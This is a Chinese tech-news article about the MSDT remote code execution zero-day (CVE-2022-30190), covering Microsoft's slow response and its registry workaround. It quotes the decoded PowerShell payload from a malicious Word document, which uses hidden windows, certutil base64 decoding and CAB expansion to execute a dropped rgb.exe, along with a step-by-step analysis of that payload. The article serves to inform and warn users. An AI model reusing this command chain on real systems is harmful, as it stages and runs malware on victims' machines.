整理 | 郑丽媛

出品 | CSDN(ID:CSDNnews)

所有 Windows 用户请注意:有一个高危零日漏洞已存在至少 7 周,有相关证据表明该漏洞已被黑客利用,借此在用户设备上“悄无声息”地安装恶意程序

起初微软不以为意

根据一位 Shadow Chaser Group 研究人员在推特上透露的消息表示,该漏洞存在于 Microsoft Support Diagnostic Tool(即微软支持诊断工具,以下简称 MSDT),且早在 4 月 12 日就报告给微软了,甚至为了证明其严重性,还附带了该漏洞已被黑客利用进行攻击的证明。

但当时的微软并没有将此视作安全漏洞,因为其安全响应中心团队认为,MSDT 在执行有效负载之前需要密码。可上周五,在研究员 Kevin Beaumont 发现上传到 VirusTotal 的 Word 文档利用了某种未知的攻击媒介时,该漏洞再次露出马脚。

据 Kevin Beaumont 分析,该文档是通过 Word 从远程 Web 服务器检索 HTML 文件,随后使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。

这个过程听起来似乎有些不可能,但 Kevin Beaumont 解释道,当文档中的命令被解码时,它们会转换为:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
Huntress 安全公司的研究员 John Hammond 对该脚本进行了解析:

启动隐藏窗口:
1.如果 msdt.exe 正在运行,则终止它
2.循环遍历 RAR 中的文件,查找编码 CAB 文件的 Base64 字符串
(1)将此 Base64 编码的 CAB 文件存储为 1.t
(2)解码 Base64 编码的 CAB 文件保存为 1.c 将 1.c CAB
(3)文件展开到当前目录中,最后:
(4)执行 rgb.exe(可能压缩在 1.c CAB 文件中)

7 周后的“幡然醒悟”

于是将近 7 周过后,本周一微软终于“醒悟”了:将该漏洞标识为 CVE-2022-30190,并将其形容为“关键”漏洞,且目前所有受支持的 Windows 版本都会受到影响。

当从调用应用程序(如 Word)使用 URL 协议调用 MSDT 时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可使用调用应用程序的权限运行任意代码。随后,攻击者可在权限允许范围内安装程序,查看、更改或删除数据,或创建新帐户。

相较于介绍漏洞、发布补丁并督促用户更新的一般流程不同,本次微软发布该漏洞的公告时,并未推出任何补丁,解决方法也只是建议用户按照以下步骤禁止 MSDT URL 协议

1.以管理员身份运行命令提示符。

2.若要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename” 。

3.执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”。

鉴于目前微软尚未推出该漏洞的对应补丁,而该漏洞又属于“高危”,建议所有经常使用 Microsoft Office 的用户在微软推出进一步防范措施前,应确保完全关闭 MSDT URL 协议,并对从互联网上下载的所有文档进行必要的审查

参考链接:

  • https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/

  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

所有 Windows 用户请注意:该高危零日漏洞已被利用 7 周相关推荐

  1. Adobe:Flash中存在高危零日漏洞

    近年来无止境的安全漏洞让Adobe Flash濒临淘汰,甚至于Adobe官方今天还发布了安全公告,表明最新版Flash存在零日漏洞,需要说明的是该漏洞是由卡巴斯基实验室的安全专家发现的.根据这份安全公 ...

  2. 更新提示!Chrome新的零日漏洞正被利用

    在修复了上一个零日漏洞之后,Chrome浏览器又开始马不停蹄地修复第二个零日漏洞. 3月2日,谷歌发布了Chrome浏览器第二个零日漏洞的修复程序,称该漏洞正被积极利用. 当天,谷歌发布了Window ...

  3. android 7.0 漏洞利用,谷歌 Android 移动操作系统中的零日漏洞被攻击者利用

    导读 谷歌 ProjectZero 研究小组一名成员周四晚表示,攻击者正在利用谷歌 Android 移动操作系统中的零日漏洞,使他们完全控制至少 18 种不同手机,包括 4 种不同型号的谷歌 Pixe ...

  4. Microsoft Exchange Server中的四个零日漏洞已被链接使用在野袭击

    CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065:被在野利用的Microsoft Exchange Server中的四个零日漏洞. ...

  5. 谷歌紧急更新,Chrome 今年第二个零日漏洞曝光

    整理 | 张仕影 出品 | CSDN(ID:CSDNnews) 在曾经市场份额疯长到全球第二的 Firefox 浏览器日益变"糊,并且如今市场占有率已不足 4% 的形势下,2008 年诞生的 ...

  6. 波及Win 11,让安全员自动放弃的零日漏洞,微软这次麻烦了

    8 月 23 日微软刚刚修复了名为"PrintNightmare"高危零日漏洞,当用户插入 Razer(雷蛇)鼠标或者键盘时,黑客有可能获得 Windows 管理员权限. 屋漏偏逢 ...

  7. 思科bfd静态路由切换_思科路由器曝出两个严重零日漏洞,已被野外利用

    点击蓝字关注我们 思科在上周末警告说,其运营商级路由器上运行的Cisco IOS XR软件中存在两个严重的内存耗尽拒绝服务(DoS)漏洞,攻击者正在试图利用中. 关于漏洞 思科的IOS XR网络操作系 ...

  8. Chrome用户请尽快更新:谷歌发现两个严重的零日漏洞

    强烈建议:Chrome用户请尽快升级浏览器!在谷歌今天发布的紧急补丁程序中修复了两个严重的零日漏洞,而其中一个已经被黑客利用.Chrome安全小组表示,这两个漏洞均为use-after-free形式, ...

  9. 微软修补Windows零日漏洞,该漏洞允许在Windows计算机上远程执行

    微软在本周最新的Patch Tuesday更新中修补了一个零日漏洞,该漏洞允许在Windows计算机上远程执行,并且已经被利用. CVE-2022-22047 是 Windows 客户端/服务器运行时 ...

最新文章

  1. android中的5个布局方式
  2. 【测试面试题】控制体重
  3. 【若依(ruoyi)】表格图片预览功能图片超宽、超高问题
  4. asp.net 的页面几种传值方式
  5. python find不区分大小写_牛鹭学院:Python基础了解
  6. zedboard的xdc文件
  7. mysql 51.数据库下载_Database Master官方下载_MySQL/SQLite数据库管理软件V5.2.51.18513下载(暂未上线)_预约_飞翔下载...
  8. vue怎么和python后端交互_python爬虫与Django框架vue交互的前后端代码详情(励志人生网实例)...
  9. 蜗牛角上争天地——吴清源大师、名人、棋魂
  10. java读取excrl模板填充数据_java中自定义excel模板并且填充内容
  11. 如何查看自己windows密钥
  12. 推荐系统的PMF - 概率矩阵分解和协同过滤
  13. 弹性盒子flex布局实现骰子六个面并让骰子3D空间旋转
  14. EfficientNet迁移学习(四) —— 损失函数解析
  15. Elastic stack技术栈学习(十)— springboot集成ES API详解
  16. 升级glibc经验谈!!!
  17. Python学习笔记——数据分析之工作环境准备及数据分析建模理论基础
  18. Arduino与FreeRTOS-守护任务(Gatekeeper Task)
  19. 2022华为软挑比赛(初赛笔记)
  20. 二选一的时候到了,Qt Widgets 还是 Qt Quick ? 致Qt开发伙伴

热门文章

  1. 一段wml,实现表单提交的
  2. 《Oracle PL/SQL程序设计(第5版)》一一1.6 一些建议
  3. 高职院校计算机信息管理技术,高职管理专业计算机信息
  4. java 文字转换成语音 代码_【Java】将文本转化成语音
  5. 我的世界服务器战斗力系统,我的世界:这个创建10年的服务器,可能拥有MC史上规模最大的大陆...
  6. python企业发放的奖金根据利润提成_100 道 Python 经典练习题002
  7. C语言各变量类型占字节数
  8. MPLS协议原理和配置
  9. python路径必须用双斜线分隔
  10. Makeblock召开2018新品发布会,正式启用中文品牌名童心制物